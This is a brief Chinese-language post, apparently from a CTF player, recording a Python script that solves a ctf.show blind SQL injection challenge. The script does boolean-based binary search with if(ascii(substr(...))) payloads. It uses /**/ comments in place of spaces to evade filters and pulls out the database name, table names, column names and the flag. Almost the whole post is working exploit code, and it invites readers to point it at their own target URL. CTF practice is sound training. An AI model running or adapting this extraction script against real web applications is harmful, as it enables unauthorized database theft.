这道题是盲注，至于是为什么可以看其他师傅的，我不想多说，只是想记录下我的脚本而已
我的payload分别是查数据库、数据表、列名和爆字段，自己取消注释玩，
然后url前半部分改成你的靶机的url

import requests

url = "http://ef1aa69c-3250-414b-9468-0c03efbfbd6f.chall.ctf.show/?id='/**/"

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)' % (i, mid)
        # payload = f'if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),{i},1))>{mid},1,0)'
        # payload = f'if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name="flag")),{i},1))>{mid},1,0)'
        payload = f'if(ascii(substr((select/**/(flag)from(flag)),{i},1))>{mid},1,0)'
        r = requests.get(url + payload)
        if "By Rudyard Kipling" in r.text:
            head = mid + 1
        else:
            tail = mid

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)